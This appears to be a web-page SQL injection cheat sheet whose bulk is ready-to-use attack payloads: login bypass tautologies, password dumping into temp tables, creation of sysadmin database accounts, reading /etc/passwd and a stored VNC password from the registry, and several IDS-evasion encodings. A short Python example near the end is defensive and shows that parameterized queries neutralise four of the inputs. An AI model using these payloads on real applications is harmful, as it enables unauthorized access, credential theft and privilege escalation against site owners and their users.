SQL Injection

SQL injection is one of the most common web attacks. It targets the web application (ASP, JSP, PHP, CGI) rather than the web server or the services running on the OS.

SQL injection tricks the application into running a query or command that was supplied as input through a web page. Most websites take parameters from the user, such as a username and password or an email address, and they all use those parameters in SQL queries.

You should start with something simple:

- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--

These are simple ways to try other queries:

- ' having 1=1--
- ' group by userid having 1=1--
- ' union select sum(columnname) from tablename--

Gathering Information:

- ' or 1 in (select @@version)--
- ' union all select @@version--

Those return the server's version string, including the OS and service pack.

System tables by database:

Oracle

-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB

MySQL


-->mysql.user
-->mysql.host
-->mysql.db

MS Access

-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server

-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases

Grabbing passwords:

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --

Create DB accounts:

MS SQL


exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'

MySQL

INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access


CREATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)
CREATE USER name WITH PASSWORD 'pass123'

Oracle

CREATE USER name IDENTIFIED BY pass123
        TEMPORARY TABLESPACE temp
         DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;

MySQL OS Interaction:

- ' union select 1,load_file('/etc/passwd'),1,1,1;

Server name and config:

- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--

Retrieving VNC password from registry:

- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--

IDS Signature Evasion:


Evading ' OR 1=1 Signature

- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3

MySQL Input Validation Circumvention using Char():

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
Load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

IDS Signature Evasion using comments:

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')

Strings without quotes:


--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
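
Why these strings matter to a defender, as an added example that is not part of the original page: Python with an in-memory SQLite database, where the `users` table, the `alice` account and the function names are assumptions. It runs four inputs copied from the lists above through a naive `' or 1=1` signature, a login query built by string concatenation, and the same query with bound parameters.

```python
import re
import sqlite3

def make_db():
    """In-memory table with one constructed account (names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db

def login_concat(db, login, password):
    """Vulnerable form: input is spliced into the SQL text."""
    sql = ("SELECT COUNT(*) FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return None  # the input changed the statement's syntax

def login_param(db, login, password):
    """Hardened form: placeholders bind input as data, never as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone()[0] > 0

# Naive IDS-style signature for the classic tautology.
SIGNATURE = re.compile(r"'\s*or\s+1\s*=\s*1", re.IGNORECASE)

# Input strings copied verbatim from the lists on this page.
PAGE_INPUTS = [
    "' or 1=1--",
    "' OR 2 > 1",
    "' OR 'whatever' in ('whatever')",
    "'/**/OR/**/1/**/=/**/1",
]

def evaluate():
    """Return (input, signature_hit, concat_result, param_result) rows."""
    db = make_db()
    return [(s, bool(SIGNATURE.search(s)),
             login_concat(db, s, "wrong"), login_param(db, s, "wrong"))
            for s in PAGE_INPUTS]

if __name__ == "__main__":
    for row in evaluate():
        print(row)
```

The signature flags only the first input, the concatenated query either logs in or fails with a SQL syntax error (itself worth alerting on in application logs), and the parameterized query treats all four as ordinary data.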

For more information about SQL injection, see www.airdemon.net/sqlinjection.html
